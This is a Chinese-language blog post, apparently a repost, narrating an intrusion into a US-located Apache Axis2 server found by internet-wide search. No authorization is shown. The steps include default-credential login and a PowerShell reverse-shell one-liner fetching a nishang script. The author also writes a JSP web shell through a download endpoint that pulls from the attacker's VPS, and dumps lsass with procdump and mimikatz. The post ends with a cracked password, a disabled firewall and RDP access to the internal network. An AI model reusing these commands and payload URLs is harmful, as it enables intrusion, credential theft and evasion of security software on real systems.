绕过杀软拿下目标站

忘是亡心i 2024-04-07 10:43 67阅读 0赞

### **0x01 目标** ###

country="US" && app="APACHE-Axis"

从老洞捡些漏网之鱼，没准还会有意外收获

[![366c73f9443f6fcaba541234d1c685e9.png][]][366c73f9443f6fcaba541234d1c685e9.png 1]

目标出现

[![ac294c53481b409d3c066ca8535b224b.png][]][ac294c53481b409d3c066ca8535b224b.png 1]

还是熟悉的页面，熟悉的端口

然后尝试默认口令登录，ok, 这下稳了

[![0dcbc6632d8faceb54e0e2158b012e7d.png][]][0dcbc6632d8faceb54e0e2158b012e7d.png 1]

先搜集一下信息

[![38a917ccd04e4ee2525868c9a405ced6.png][]][38a917ccd04e4ee2525868c9a405ced6.png 1]

不要上来就部署包，先看一下现有的服务，像这种弱口令的基本上99.9999%都已经被人搞过了

[![c04f9d944f054acd1f21c72f917e9da6.png][]][c04f9d944f054acd1f21c72f917e9da6.png 1]

[![a12d98007585c94986daa9a2bb0f474b.png][]][a12d98007585c94986daa9a2bb0f474b.png 1]

再上传包就多此一举了，可以直接利用

找了一圈没发现遗留的马儿

找绝对路径自己上传

C:/elocker/webapps/admin/WEB-INF/classes

[![c76c7a7b32996c045bab78e6e04b4403.png][]][c76c7a7b32996c045bab78e6e04b4403.png 1]

顺手一测，竟然可以出网，也不需要传shell了，直接掏出cs

[![67893bd8f29b97e8c59b232c83eadf16.png][]][67893bd8f29b97e8c59b232c83eadf16.png 1]

执行命令

[![206db74a4437d9e9de31b37e00a6924d.png][]][206db74a4437d9e9de31b37e00a6924d.png 1]

看结果失败了

### 0x02 反弹shell ###

难道是因为在url里执行，导致powershell命令没有执行成功吗？

带着这个疑问 反弹shell尝试一下

[![690d91ec6822e32d5be176f3891cfecc.png][]][690d91ec6822e32d5be176f3891cfecc.png 1]

[![f9ae92287788a35e25a111d5e5fdd842.png][]][f9ae92287788a35e25a111d5e5fdd842.png 1]

结果还是失败，可以确定，应该是有waf

### 0x03 写入shell ###

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp

[![a1b7450d69815d5a0b6d9cc21967545d.png][]][a1b7450d69815d5a0b6d9cc21967545d.png 1]

[![89b9576e683e3a404e07947ca970c895.png][]][89b9576e683e3a404e07947ca970c895.png 1]

查看一下进程

[![5218ef6842d85fe3595b958909b9adf0.png][]][5218ef6842d85fe3595b958909b9adf0.png 1]

通过对比发现某安全卫士

[![ca7fc01e9ab28a85a39d1b228b4f9bb8.png][]][ca7fc01e9ab28a85a39d1b228b4f9bb8.png 1]

### 0x04 绕过杀软 ###

通过测试发现，最基本的`net user`也执行不了

摆在面前的路只有2条

*  做免杀
 *  抓密码

果断选择抓密码，简单有效。

mimikatz不免杀不可直接用

这里我利用procdump把lsass进程的内存文件导出本地，再在本地利用mimikatz读取密码

上传 procdump64.exe 并下载lsass.dmp

[![51056b344ad1fd86f1f09cb1c03002d0.png][]][51056b344ad1fd86f1f09cb1c03002d0.png 1]

[![aa684cca3f97b4ba76a23421f22bf588.png][]][aa684cca3f97b4ba76a23421f22bf588.png 1]

再在本地解析文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    # 导出为lsass.dump文件
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
    # 把lsass.dmp放在mimikatz目录利用

[![657fad1c1ab756c7a370153a4df30502.png][]][657fad1c1ab756c7a370153a4df30502.png 1]

得到hash,破解密码

[![f736e7bbc2651e80f9bc23b7a81b9e61.png][]][f736e7bbc2651e80f9bc23b7a81b9e61.png 1]

### 0x05 登录服务器 ###

查看防火墙状态

Netsh Advfirewall show allprofiles

关闭防火墙

NetSh Advfirewall set allprofiles state off

[![4062ba8b19c47cee47cd51b3068e7f4b.png][]][4062ba8b19c47cee47cd51b3068e7f4b.png 1]

[![1ac8b96123f9a69c587fe1b7f9a62a41.png][]][1ac8b96123f9a69c587fe1b7f9a62a41.png 1]

内网IP，需搭建代理

[![307dcac805d3d6af5a09798057e62848.png][]][307dcac805d3d6af5a09798057e62848.png 1]

[![e07f60aa688aa7def05767200e3d771c.png][]][e07f60aa688aa7def05767200e3d771c.png 1]

[![c608fdc81b5e3936012216f009d0a02a.png][]][c608fdc81b5e3936012216f009d0a02a.png 1]

### 0x06 登录云桌面，发现意外惊喜 ###

发现机主运行了 telegram，嘿嘿

[![092b10271d332ac22991276a89ffe626.png][]][092b10271d332ac22991276a89ffe626.png 1]

[![38364f0c1e641d7991aad8f2d98d4734.png][]][38364f0c1e641d7991aad8f2d98d4734.png 1]

[![1cb1bea477ab4b6b4fc9a34eb7b008c2.png][]][1cb1bea477ab4b6b4fc9a34eb7b008c2.png 1]

### 0x07 总结 ###

1.通过fofa的语法country="US" && app="APACHE-Axis"进行搜索漏洞目标

2.发现存在一个axis2的后台，该页面存在弱口令(admin/axis2)

3.在后台处的upload sevice处上传AxisInvoker.aar包

4.查询到网站的绝对路径为：C:/elocker/webapps/admin/WEB-INF/classes

http://www.xxx.com/axis2/services/AxisInvoker/info

5.尝试通过cs生成posershell后门程序，通过访问下面地址触发，但是访问失败(可能系统中存在杀软拦截了)

http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666

http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C：

6.通过下载文件方式写入大马

http://www.xxx.com/axis2/services/AxisInvoker/download?url=http://vps/data.txt&file=C:\\elocker\\webapps\\admin\\axis2-web\\shell.jsp

7.在大马中执行tasklist,发现存在360tary(360杀毒)以及zhudongfangyu.exe(安全卫士)

8.在大马中上传冰蝎的一句户话木马，然后连接，执行命令net user出错。

9.这里通过冰蝎上传 procdump64.exe,并执行命令导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

10.通过冰蝎下载 lsass.dmp到本地。

11.通过mimkiatz导入lsass.dump并读取出hash值

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

12.通过md5破解网站对HSAH值进行NTML破解，并成功破解出密码：123QWEqwe

13.通过大马执行以下命令

Netsh Advfirewall show allprofiles //查看防火墙状态

NetSh Advfirewall set allprofiles state off //关闭防火墙

14.通过冰蝎自带的socke功能开启代理，本地设置Proxifier代理将MSTSC添加到代理中

15.通过代理执行mstsc，远程桌面登录内网，桌面发现存在telegram

原文链接： [https://xz.aliyun.com/t/9856][https_xz.aliyun.com_t_9856]

[366c73f9443f6fcaba541234d1c685e9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/bfd43837aed34ec8919849b377f8b77d.png
[366c73f9443f6fcaba541234d1c685e9.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152230-3fdd024a-e474-1.png
[ac294c53481b409d3c066ca8535b224b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0fe8ecfca94c4f3e9f61dcca82335bc2.png
[ac294c53481b409d3c066ca8535b224b.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152405-78cd6edc-e474-1.png
[0dcbc6632d8faceb54e0e2158b012e7d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e2fc3c6b162f4ef6880e59c388930bd4.png
[0dcbc6632d8faceb54e0e2158b012e7d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152611-c39b0fd2-e474-1.png
[38a917ccd04e4ee2525868c9a405ced6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6d4d84a8cfa7468b8a2683ab8a0afb7d.png
[38a917ccd04e4ee2525868c9a405ced6.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152642-d5faad2c-e474-1.png
[c04f9d944f054acd1f21c72f917e9da6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7c7d4186bbb44e1db857334a60283a74.png
[c04f9d944f054acd1f21c72f917e9da6.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152741-f993a5c2-e474-1.png
[a12d98007585c94986daa9a2bb0f474b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/87b1dc4db84a42d08982c66938f9d619.png
[a12d98007585c94986daa9a2bb0f474b.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714152750-fed326c0-e474-1.png
[c76c7a7b32996c045bab78e6e04b4403.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1390c5759c494b4e84c93357b0cc4f71.png
[c76c7a7b32996c045bab78e6e04b4403.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714153205-96dbfabe-e475-1.png
[67893bd8f29b97e8c59b232c83eadf16.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/10fd947a538345b4a6474f38e56896a9.png
[67893bd8f29b97e8c59b232c83eadf16.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714153502-00089858-e476-1.png
[206db74a4437d9e9de31b37e00a6924d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f4b7fdd8575c4046bfc0867d7db22825.png
[206db74a4437d9e9de31b37e00a6924d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714153550-1c8a1ac4-e476-1.png
[690d91ec6822e32d5be176f3891cfecc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/381ca9ecd21b4495bc0336d534e764cb.png
[690d91ec6822e32d5be176f3891cfecc.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714154439-57dcf456-e477-1.png
[f9ae92287788a35e25a111d5e5fdd842.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/28af7e741a1f4e1ead71c85d5cbb4093.png
[f9ae92287788a35e25a111d5e5fdd842.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714154458-639ac7dc-e477-1.png
[a1b7450d69815d5a0b6d9cc21967545d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4dfd5c9b3ad44277b4f7a854f4d072f1.png
[a1b7450d69815d5a0b6d9cc21967545d.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714154852-ef1d462c-e477-1.png
[89b9576e683e3a404e07947ca970c895.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ce5e1687ec4145e0a28c049a72f7a899.png
[89b9576e683e3a404e07947ca970c895.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714154904-f5c0690a-e477-1.png
[5218ef6842d85fe3595b958909b9adf0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8dd8dfde87e3461792010d49ac04a271.png
[5218ef6842d85fe3595b958909b9adf0.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714155219-6a1d0d30-e478-1.png
[ca7fc01e9ab28a85a39d1b228b4f9bb8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/17bb20c9775f42648b43d553411822cc.png
[ca7fc01e9ab28a85a39d1b228b4f9bb8.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714155312-8990a0d2-e478-1.png
[51056b344ad1fd86f1f09cb1c03002d0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4a415ae001ef4ad29dca9812cb8f9e5c.png
[51056b344ad1fd86f1f09cb1c03002d0.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161612-c024ab04-e47b-1.png
[aa684cca3f97b4ba76a23421f22bf588.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8759568de8a844929578e7d78435c96f.png
[aa684cca3f97b4ba76a23421f22bf588.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161418-7c3254a0-e47b-1.png
[657fad1c1ab756c7a370153a4df30502.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/015c64703eca4a2784fbe74c560e739b.png
[657fad1c1ab756c7a370153a4df30502.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161629-ca5812c8-e47b-1.png
[f736e7bbc2651e80f9bc23b7a81b9e61.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/74cc19f6d58d45748a74b9b2e7f1eddd.png
[f736e7bbc2651e80f9bc23b7a81b9e61.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161655-d9eec1e6-e47b-1.png
[4062ba8b19c47cee47cd51b3068e7f4b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/24bc6485fde140f5a38ff9fea492d6f8.png
[4062ba8b19c47cee47cd51b3068e7f4b.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161836-163a269a-e47c-1.png
[1ac8b96123f9a69c587fe1b7f9a62a41.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/746373f1b9c74476920541b5f1f9d680.png
[1ac8b96123f9a69c587fe1b7f9a62a41.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714161850-1e4f2a24-e47c-1.png
[307dcac805d3d6af5a09798057e62848.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3413091d5b5f46c799e153418fdbe48e.png
[307dcac805d3d6af5a09798057e62848.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162039-5fb46380-e47c-1.png
[e07f60aa688aa7def05767200e3d771c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f530f92c4e3041c8b5cadfeb6a72d83f.png
[e07f60aa688aa7def05767200e3d771c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162053-67e3d18a-e47c-1.png
[c608fdc81b5e3936012216f009d0a02a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/960a47379b0142a38e483be5f50b867d.png
[c608fdc81b5e3936012216f009d0a02a.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162104-6eb74cf8-e47c-1.png
[092b10271d332ac22991276a89ffe626.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5d9cca5ecf824e6e83fd191a0c133a90.png
[092b10271d332ac22991276a89ffe626.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162152-8adbfeb0-e47c-1.png
[38364f0c1e641d7991aad8f2d98d4734.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/9762897b92a24edd838c082014b4136f.png
[38364f0c1e641d7991aad8f2d98d4734.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162204-927a1bf2-e47c-1.png
[1cb1bea477ab4b6b4fc9a34eb7b008c2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c7ea41f4785e438a95642b1281e79cad.png
[1cb1bea477ab4b6b4fc9a34eb7b008c2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20210714162215-98ed53aa-e47c-1.png
[https_xz.aliyun.com_t_9856]: https://xz.aliyun.com/t/9856